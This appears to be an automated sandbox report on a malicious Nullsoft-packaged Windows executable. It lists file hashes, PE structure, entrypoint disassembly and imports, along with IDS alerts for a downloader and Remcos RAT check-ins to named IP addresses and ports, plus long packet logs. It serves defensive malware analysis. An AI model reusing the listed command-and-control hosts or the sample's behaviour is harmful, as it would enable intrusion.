SSDEEP:	12288:HQIoWuLS5jMYG1kqqGDFL34Od2l2QrClyxzwsNZU18Do9I4jMSPM:H7uLS5jtGTDFoOd2YQIyZfZ74jvM
MD5:	02F086FB54D58BF17B51564B34166F5E
SHA1:	6AD69C9BDAFB1A4CA5C0D15836B3E0ABDD0A1E62
SHA-256:	2AC935868A1F972E5A036986147051402E1B656A5AC9AC4B8CA15252F14E15FD
SHA-512:	D34CEB0A5835C88F3D10A3E2E31F0E91A71809C5C514A1D2573C5A126E51F5BD4EF1F4F41B166F468D2222B6D0ABF04871109A3450F039EB4A577B9067C02AFA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h...........3............@.......................................@.......................................... ...............................................................................................................text...'f.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata.......P...........................rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.022322453988849
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	zR4aIjCuRs.exe
File size:	776'478 bytes
MD5:	02f086fb54d58bf17b51564b34166f5e
SHA1:	6ad69c9bdafb1a4ca5c0d15836b3e0abdd0a1e62
SHA256:	2ac935868a1f972e5a036986147051402e1b656a5ac9ac4b8ca15252f14e15fd
SHA512:	d34ceb0a5835c88f3d10a3e2e31f0e91a71809c5c514a1d2573c5a126e51f5bd4ef1f4f41b166f468d2222b6d0abf04871109a3450f039eb4a577b9067c02afa
SSDEEP:	12288:HQIoWuLS5jMYG1kqqGDFL34Od2l2QrClyxzwsNZU18Do9I4jMSPM:H7uLS5jtGTDFoOd2YQIyZfZ74jvM
TLSH:	F9F412003AC0CC23DDA10A749DA7C7EA6B786E54AC05DB477704BF4E78773D36A1AA91
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h.........

File Icon


Icon Hash:	5cf87c6c5d460252

Static PE Info

General

Entrypoint:	0x40338f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A6FED3C [Tue Jan 30 03:57:48 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [00434EECh], eax
je 00007F86EC51FC63h
push ebx
call 00007F86EC522F15h
cmp eax, ebx
je 00007F86EC51FC59h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F86EC522E8Fh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F86EC51FC3Ch
push 0000000Ah
call 00007F86EC522EE8h
push 00000008h
call 00007F86EC522EE1h
push 00000006h
mov dword ptr [00434EE4h], eax
call 00007F86EC522ED5h
cmp eax, ebx
je 00007F86EC51FC61h
push 0000001Eh
call eax
test eax, eax
je 00007F86EC51FC59h
or byte ptr [00434EEFh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [00434FB8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0042B208h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8608	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x39180	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6627	0x6800	8c030dfed318c62753a7b0d60218279b	False	0.6642503004807693	data	6.452235553722483	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x149a	0x1600	966a3835fd2d9407261ae78460c26dcc	False	0.43803267045454547	data	5.007075185851696	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2aff8	0x600	939516377e7577b622eb1ffdc4b5db4a	False	0.517578125	data	4.03532418489749	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x1d000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x52000	0x39180	0x39200	2b4e1d509c996fc0835cd264198de9c9	False	0.33165942970459517	data	3.439269253351708	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x524a8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.1941470483851887
RT_ICON	0x62cd0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.21788942610889217
RT_ICON	0x6c178	0x7da9	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9887780161024589
RT_ICON	0x73f28	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 26560	English	United States	0.22041353383458648
RT_ICON	0x7a710	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.22504621072088724
RT_ICON	0x7fb98	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.22815304676428907
RT_ICON	0x83dc0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.24553941908713692
RT_ICON	0x86368	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.26852720450281425
RT_ICON	0x87410	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.4341684434968017
RT_ICON	0x882b8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.29713114754098363
RT_ICON	0x88c40	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.4453971119133574
RT_ICON	0x894e8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.3824884792626728
RT_ICON	0x89bb0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.24566473988439305
RT_ICON	0x8a118	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.3421985815602837
RT_DIALOG	0x8a580	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x8a6c8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x8a7c8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x8a8e8	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x8a9b0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x8aa10	0xca	data	English	United States	0.6633663366336634
RT_VERSION	0x8aae0	0x274	data	English	United States	0.5222929936305732
RT_MANIFEST	0x8ad58	0x423	XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators	English	United States	0.5127478753541076

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-06T11:47:04.196262+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.11.20	49768	85.120.16.93	443	TCP
2024-10-06T11:47:10.534594+0200	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.11.20	49769	192.169.69.26	3980	TCP
2024-10-06T11:47:33.265040+0200	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.11.20	49773	192.169.69.26	3980	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 6, 2024 11:47:03.316562891 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:03.316688061 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:03.317028999 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:03.342674017 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:03.342745066 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:03.758506060 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:03.758790016 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:03.788209915 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:03.788296938 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:03.789587975 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:03.789776087 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:03.791614056 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:03.832364082 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.196424961 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.196645021 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.196736097 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.196894884 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.398116112 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.398140907 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.398263931 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.398349047 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.398403883 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.398515940 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.398680925 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.399157047 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.399210930 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.399408102 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.399409056 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.399480104 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.399518967 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.399709940 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.600701094 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.600740910 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.600898027 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.600924969 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.600944042 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.601089001 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.601758003 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.601793051 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.601912022 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.601989985 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.602016926 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.602133036 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.602236032 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.603197098 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.603229046 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.603394032 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.603415966 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.603457928 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.603646040 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.801456928 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.801498890 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.801604033 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.801681042 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.801696062 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.801839113 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.802149057 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.802185059 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.802280903 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.802280903 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.802328110 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.802377939 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.802390099 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.802500963 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.802566051 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.802666903 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.802699089 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.802812099 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.802851915 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.802865982 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.802917004 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.803116083 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.803148985 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.803282022 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.803299904 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.803459883 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.803482056 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.803540945 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.803747892 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.803909063 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.803946018 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.804061890 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.804307938 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.804322958 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.804554939 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.843939066 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.843978882 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.844090939 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.844285965 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:04.844301939 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:04.844610929 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.002325058 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.002365112 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.002563000 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.002583981 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.002626896 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.002743959 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.002844095 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.002882957 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.002952099 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.003000021 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.003101110 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.003113031 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.003243923 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.003735065 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.003762007 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.003962040 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.004059076 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.004188061 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.004199982 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.004504919 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.004535913 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.004642010 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.004658937 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.004877090 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.004959106 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.004986048 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.005085945 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.005161047 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.005176067 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.005278111 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.005403996 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.005434990 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.005474091 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.005486012 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.005569935 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.005569935 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.005667925 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.005733967 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.005759954 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.005789042 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.005942106 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.006031990 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.006045103 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.006153107 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.006186008 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.006227970 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.006242037 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.006304979 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.006396055 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.006505013 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.006530046 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.006551981 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.006565094 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.006629944 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.006629944 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.006726980 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.006726980 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.006776094 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.006882906 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.006915092 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.007020950 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.007241011 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.007253885 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.007388115 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.007412910 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.007422924 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.007436991 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.007591963 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.007657051 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.047252893 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.047283888 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.047388077 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.047489882 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.047502041 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.047586918 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.047736883 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.087357998 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.087428093 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.087564945 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.087728024 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.087771893 CEST	443	49768	85.120.16.93	192.168.11.20
Oct 6, 2024 11:47:05.087910891 CEST	49768	443	192.168.11.20	85.120.16.93
Oct 6, 2024 11:47:05.205553055 CEST	443	49768	85.120.16.93	192.168.11.20
